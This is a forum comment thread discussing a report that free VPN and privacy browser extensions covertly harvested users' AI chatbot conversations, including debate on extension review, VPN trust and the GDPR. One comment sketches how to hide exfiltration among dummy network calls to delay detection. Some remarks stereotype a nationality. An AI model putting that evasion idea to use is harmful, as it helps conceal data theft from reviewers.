For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.
I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.
You can grant access to a few specific sites (in chrome at least), it's just hidden in settings and you need to configure it manually.
“ A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude”
Is this where we’re at with AI?
People used to cast lots to make major life decisions.
Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.
Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.
Yes, but its incredibly dangerous when the operator of the token predictor can give you, personally, different behavior and can influence your decisions even more directly than before.
Some people are incapable of internal thought. They have to verbalise/write down their thoughts, so they can hear/read it back, and that's how they make progress. In a way, these people's brain do work like LLMs.
There is no evidence whatsoever that having or not having inner monologue confers any advantages or disadvantages.
For all we know, it's just two paths the brain can take to arrive at the same destination.
3 replies →
It does strike me as pretty crazy, but I'm at the other end of the spectrum, I almost never think about using an AI for anything. I've tried Claude I think, twice (it wasn't very helpful). The only other AI I've ever used are the "AI summaries" that Duck Duck Go sometimes shows at the top of its search results.
If this is surprising to you then your circle is fairly unusual.
For example HBR recently reported the number 1 use for ChatGPT is "Therapy/companionship"
https://archive.is/Y76c5
Delegating life decisions to AI is obviously quite stupid but it can really help lay out and question your thoughts even if it's obviously biased.
I constantly use AI like this. For life decisions, for complicated logistics situations, for technical decisions and architectures, etc. I'm not having it make any decisions for me, I'm just talking through things with another entity who has a vast breadth of knowledge, and will almost always suggest a different angle or approach that I hadn't considered.
Here's an example of the kinds of things I've talked with ChatGPT about in the last few weeks:
- I'm moving to a new area and I share custody of my daughter, so this adds a lot of complications around logistics. Talked through all that.
- Had it research niche podcasts and youtube channels for advertising / sponsorship opportunities for my SaaS
- Talked through a really complex architecture decision that's a mix of technical info and big tradeoffs for cost and customer experience.
- Did some research and talked through options for buying two new vehicles for the upcoming move, and what kinds work best for use cases (which are complex)
- Lots and lots of discussions around complex tax planning for 2026 and beyond
Again, these models have vast knowledge, as well as access to search and other tools to gather up-to-date info and sift through it far faster than I can. Why wouldn't I talk through these things with them? In my experience, with a little guardrails ("double check this" or "search and verify that X..."), I'm finding it more trustworthy than most experts in those fields. For example, I've gotten all kinds of incorrect tax advice from CPAs. Sometimes ChatGPT is out of date, but it's generally pretty accurate around taxes ime, especially if I have it search to verify things.
A certain type of person loves nothing more than to spill their guts to anyone who will listen. They don’t see their conversational partners as other equally aware entities—they are just a sounding board for whatever is in this person's head. So LLMs are incredibly appealing to these folks. LLMs never get tired or zone out or make snarky responses. Add in chatbots’ obsequious enabling, and these folks are instantly hooked.
Do you just mean external vs internal processing/thinking?
As someone who has witnessed BiScience tracking in the past, I am not surprised to to hear that they might be involved in all this. They came up in the past when researchers investigated the cyberhaven compromise [1][2]. Though the correlation might not all be there its kind of disappointing
[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)
I don't understand why so many people are using / trusting VPNs
"Let us handle all your internet traffic.. you can trust us.. we're free!"
No thank you.
ISPs are so heavily regulated that the will give any federal or government agency free access to future and past internet connection information that are directly tied to your real identity.
Meanwhile reputable VPN provider like mullvad offer there service without KYC and leave feds empty handed when they knock on there doors.
https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...
For the same reason you trust your ISP? It handles all your internet traffic; and depending on where you live, probably has government-mandated back doors, or is willing to cooperate with arbitrary requests from law-enforcement agencies.
That's why TLS exists, after all. All Internet traffic is wiretapped.
Because I pay the ISP, it is heavily regulated, and they actually make a lot of money from being an ISP?
I'd be significantly more suspicious by default of ISPs that charge no money.
> That's why TLS exists, after all.
That protects you if you're using standard methods to connect. Installed software gets to bypass it.
3 replies →
> I don't understand why so many people are using [Cloudflare].
> "Let us handle all your internet traffic.. you can trust us.. []"
TLS does not help, when most Internet traffic is passed through a single entity, which by default will use an edge TLS certificate and re-encrypt all data passing through, so will have decrypted plain text visibility to all data transmitted.
I have a contract with my ISP, I can know who runs the company and I can sue the company if they violate anything they promised.
1 reply →
TLS doesnt hide IP addresses
A lot of people from poor countries where they can't access a lot of websites/services and also can't pay for a VPN use these "free" VPNs
but other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN
The use case is people that are urged to view something that is blocked (torrent / adult / gambling). They want it now, and they don't want to get involved with some shady company that slaps on a 2 year contract and keeps extending indefinitely. These people instead find "free vpn" in the web store and decide to give it a try.
VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?
Me personally? I'm using Firefox with EFF privacy badger. No others.
Yeah free VPN is totally a problem, but there's TLS so at least those users aren't getting their bank account information stolen.
TLS works when app is installed somewhere else, but not in browser itself. Browser actually handles TLS termination.
Does tls means certificate pinning ? Can't a vpn alter dns queries to return a proxy website to your bank, using a forged certificate ?
2 replies →
Google needs to act on removing these extensions/doing more thorough code reviews. Reputability is everything, and they can be actually valuable (e.g. LastPass, my own extension Ward)
There has to be a better system. Maybe a public extension safety directory?
I don't understand how code review would catch this. The extension advertises itself as an AI protection tool, that monitors your AI interactions. The code is basically consistent with the stated purpose. That it doesn't stop collecting data when you turn of the UI alerting is perhaps an inconsistency, but I think that's debatable (is there a rule in google's terms that says data collection is contingent on UI alerts being enabled?). I'm curious what workflow or decision tree you'd expect a code review process to follow here that results in this being rejected? The problem here doesn't seem like code related, it's policy related, as in, what are they doing with the information, not that the extension has code to collect it.
I’m not sure there’s much more juice to squeeze here via automated or semi-automated means. They could perhaps be doing these kind of human-in-the-loop reviews themselves for all extensions that hit a certain install count, but that’s not a popular technique at Google.
Chrome extension codebases are fairly basic, I think there's room to build an agentic code scanner for these, but the juice probably isn't worth the squeeze to justify for them $$$-wise. Manual reviews I agree are expensive and dicey.
Do you think Google wants to have the extensions system, given that this is how people block ads?
adblockers on chromium-based browsers were severely crippled by manifest V3. they're fine with extenisons (and apparently malware) as long as users can't effectively block their tracking/ads.
4 replies →
I wouldn’t be surprised if it goes away - it’s very “old Google”. We’re moving more towards walled gardens.
Google is doing code review on extensions?
I’m not sure, but whenever I cut a new release I upload my extension code and it goes through a review period before they publish.
Is this even a problem that code review could find? Once they have your conversation data what happens then isn't part of the plug-in.
You're not wrong, but one thing about scammy developers is they tend to be ballsy and not covert. The Koi blog covers all the egregious code specifically for exfilling LLM conversations. This stuff is a walking red flag if it was in a public commit/PR.
I thought manifest v3 was supposed to make chrome extensions secure?
Its the reason why they found it because the code was in extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
> extensions could just load external scripts and there's no way you could tell what they were actually doing.
I do think security researchers would be able to figure out what scripts are downloaded and run.
Regardless, none of this seems to matter to end users whether the script is in the extension or external.
2 replies →
Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?
If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.
2 replies →
Let me ask you this way: How do you think they make money?
I believe you may be missing the sarcasm of the post you are responding to.
3 replies →
I'm glad the extension system isn't broken (e.g. extensions being hacked). This is just scammy extensions to begin with. I've been scared of extensions since they were first offered (I did like useing greasemonkey to customize everything back in the 2000's/2010's), but I can't resist privacy badger and Ublock Origin since they are open source (but even then it's still a risk).
What is the economic value of all these AI chat logs? I can see it useful for developing advertising profile. But I wonder if it's also just sold as training data for people try to build their own models?
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
Not just advertising but market research. Loads of people want to know exactly what type of questions ppl are asking these chat bots
So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
3 replies →
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
I wouldn't be surprised if this was done by one of those AI companies themselves!
Remember FaceBook x Onavo?
"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
[flagged]
I would figure state actors don’t need to go through the trouble of a browser extension. But, yeah.
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is hack/steal it. 25 years of social media has shown that people really don't care about what they do with their data.
4 replies →
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
Download Valley strikes again!
How did I know this was an israeli company just by how unethical they are at scale?
Well, you’d be surprised to discover that Koi is also an Israeli company, and they were the ones who even discovered this
https://www.calcalistech.com/ctechnews/article/syoe1xjslx
It would have been no less suprising to me had it been a US company but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
And what are the odds that mossad are getting access to this data?
Some people have mentioned that this is a U.S incorporated company (Delaware). Recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S role as the new shell company haven.
The island states have been dethroned.
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
> This means a human at Google reviewed Urban VPN Proxy and concluded it met their standards.
Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
Why would one expect privacy with a vpn? That too a free one? With the web all traffic is encrypted point to point, which means individual sites could compromise your privacy but there is no single funnel to lose all your data. VPN is exactly that! All data goes through a single funnel and they can target anything they want
Because VPNs are exclusively and heavily marketed and sold as magical turnkey solutions to privacy, encryption, hair loss, and more!
lol, this Urban VPN addon was available for Firefox too but got removed at some point. https://old.reddit.com/r/firefox/comments/1jb4ura/what_happe...
Thanks, the last fetched page on archive.org is from 2025-01-26 [1], removed after this date and before 2025-02-13. 155,477 users at the moment, 1 star reviews were mostly about not working. It's interesting that the developers didn't care to remove the button directing to the ff add-on page at least several months after the removal. Maybe was some kind of PR compromise, they probably thought that listing it with linking to a broken page was better than not listing at all.
A review page [2] mentions that this add-on is a peer-to-peer vpn, not having its own dedicated servers that already makes it suspicious.
[1] https://web.archive.org/web/20250126133131/https://addons.mo...
[2] https://www.vpnmentor.com/reviews/urban-vpn/
Is the use of WebAssembly going to make spotting these malicious extensions harder?
Probably not. All side effects need to go through the js side. So you can alway see where http calls are made
> Probably not. All side effects need to go through the js side. So you can alway see where http calls are made
That can be circumnavigated by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like an normal-passing update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
1 reply →
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
Why is a security researcher using a Free VPN? The standard wisdom is "if its free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? Its not great to trust paid services with your data, nevermind free stuff.
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
They are not. They found it by searching for extensions that had the capability to exfiltrate data.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
Oh, a free of cost vpn extension that requires access to all sites and data is somehow spyware, color me surprised.
With those extensions the user's data and internet are the product, most if not all are also selling residential IP access for scrapers, bots, etc.
Good thing Google is protecting users by taking down such harmful extensions as ublock origin instead.
ublock requires access to all sites and data. Maybe they are trustworthy but who really knows?
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
2 replies →
I mean, I don't trust ublock, for what it's worth. I just disable javascript by default with has pretty much the same effect.
I wish Congress spent as much time fighting about issues like this vs trying to break up Google. This is far more impact.
Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing
Would using native AI apps only prevent this? I think so right?
Which "AI" has a native app?
Or you mean the web sites packed with a copy of chromium?
Correct. The article is about Chrome and MS Edge browser extensions.
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.
Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
Why these browser extensions cannot live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had legacy React developer tools and Redux DevTools installed for years. What a great attack vector.
Am I just paranoid or open router is the next bomb ticking to a privacy explosion? What is their business model anyway?
Note that in the profile of a model in Openrouter, under Data Policy, there is a statement as "Prompt Training". Some of model will clearly stated that prompt training is true, even for paid models.
>What is their business model anyway?
They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.
Do we know for how much that type of content sells? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low
I doubt its the actual conversations but the aggregated insights that are valuable.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
Is this criminally prosecutable?
What would the fallout look like if too many people start to have horror stories about how much their life is destroyed by incriminating or down right nasty or wrong ai chat history. It'll suddenly become a tool where you can't be honest. If it's not already.
This is digital assault of 8m people and should be treated that way.
> And then an uncomfortable thought: what if someone was reading all of this?
> The thought didn't let go. As a security researcher, I have the tools to answer that question.
What huh, no you don't! As a security researcher you should know better!
> Exactly the kind of tool someone installs when they want to protect themselves online.
No. When you want to increase your security, you install fewer tools.
Each tool increases your exposure. Why is the security industry full of people who don't get this?
Can someone just AI all the privacy policies please and tell us who else is pranking?
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
Wasn't the whole coercion Google did around Manifest V3 in the name of security?
How is it possible to have extensions this egregiously malicious in the new system?
"And then an uncomfortable thought: what if someone was reading all of this?"
If you really are a security researcher then that's not true. You already know all this.
If you want a VPN you can trust, deploy your own with AlgoVPN: https://github.com/trailofbits/algo
I prefer WG-Easy (https://github.com/wg-easy/wg-easy), which uses a Docker container, not ansible.
I treat extensions like they're all capable of privileged local code execution. My selection is very vetted and very small.
The only extensions I have installed are dark reader and ublock origin. Would be nice if I could disable auto updating for them somehow and run local pinned versions...
Get the source code and manually pack your own unsigned web-ext’s.
Add-ons Manager -> (click the add-on in question) -> change "Allow automatic updates" to "Off"
(for firefox/derivatives anyways...)
Same here, uBlock Origin and EFF's Privacy Badger are the only extensions I trust enough to install.
Ditto, plus 1pass / BitWarden.
Only those users that were stupid enough to "converse" with their chatbot.
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
I imagine this would be a great use case for AI helping out?
I'm thinking of installing the extension in a sandbox and then use a local agent to have endless fake conversations with it
“There’s too much human harmful code to review and too few human reviewers.”
“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”
No way that could backfire... Prompt injection is a solved problem right?
With hardcoded flags like “sendClaudeMessages” and “sendChatgptMessages”, they weren’t even trying to hide it.
If the product is free, you are the product.
8 million users on sketchy VPN extensions.
70 thousand users on what I would actually call "privacy" extensions.
Bit of a misleading title then.
Is this the same Google that is preventing us from installing unapproved software on our phones?
If the business model isn't obvious, you are the product
> A free VPN promising privacy and security.
If you are not paying for the product, you are the product.
Can we please, please stop using this absolutely deprecated proverb? As shown in YouTube lite, Samsung fridges with ads, cars with telemetry etc. etc. even if you paid, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
The footer animation of koi.ai is so cool.
These converstions can be used to train a competing AI
> We asked Wings, our agentic-AI risk engine
I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?
Pro tip - never install any browser extensions. Avoid like a plague. I had a couple installed that were “legitimate” and I have direct evidence of them leaking/selling my browsing data. Just avoid.
b xncbb vnxv
fasdfas
There were these two people.
And um, a boy and a girl.
...
Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.
They started being seen exchanging tokens of affection.
And it was rumoured they were engaging in...
Note that this is a pretty blatant GDPR violation and you should report this to the local data protection agency if you are a EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings also let you revoke this consent. According to the article, the latter isn't the case and the user is never informed of the extent of the collection and the risk of sensitive or specially protected personal information (e.g. sexual orientation) being part of the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information but that's irrelevant because processing necessarily happens after collection and the GDPR already applies at the start of that pipeline.
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you except some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
TLDR: AI company uses AI to write blog post about abusive AI chrome extension
(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)
ctrl-f israel: 1 result found
4*
2*
Deleted.
What sort of argument is that? Just because I need to eat (also let's be real the developers/owners behind this app are not struggling to get food on the table), does excuse me doing unethical/illegal things (and this behaviour is almost certainly illegal in the EU at least).
There is a “contradictions” section that clearly explains why this is a scam of the highest order.
There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.
The guy that holds up people for money in the alley is a human too, people forget, and needs to pay for food and a place to live. Of course they do too.
It's ridiculous how many comments are being removed.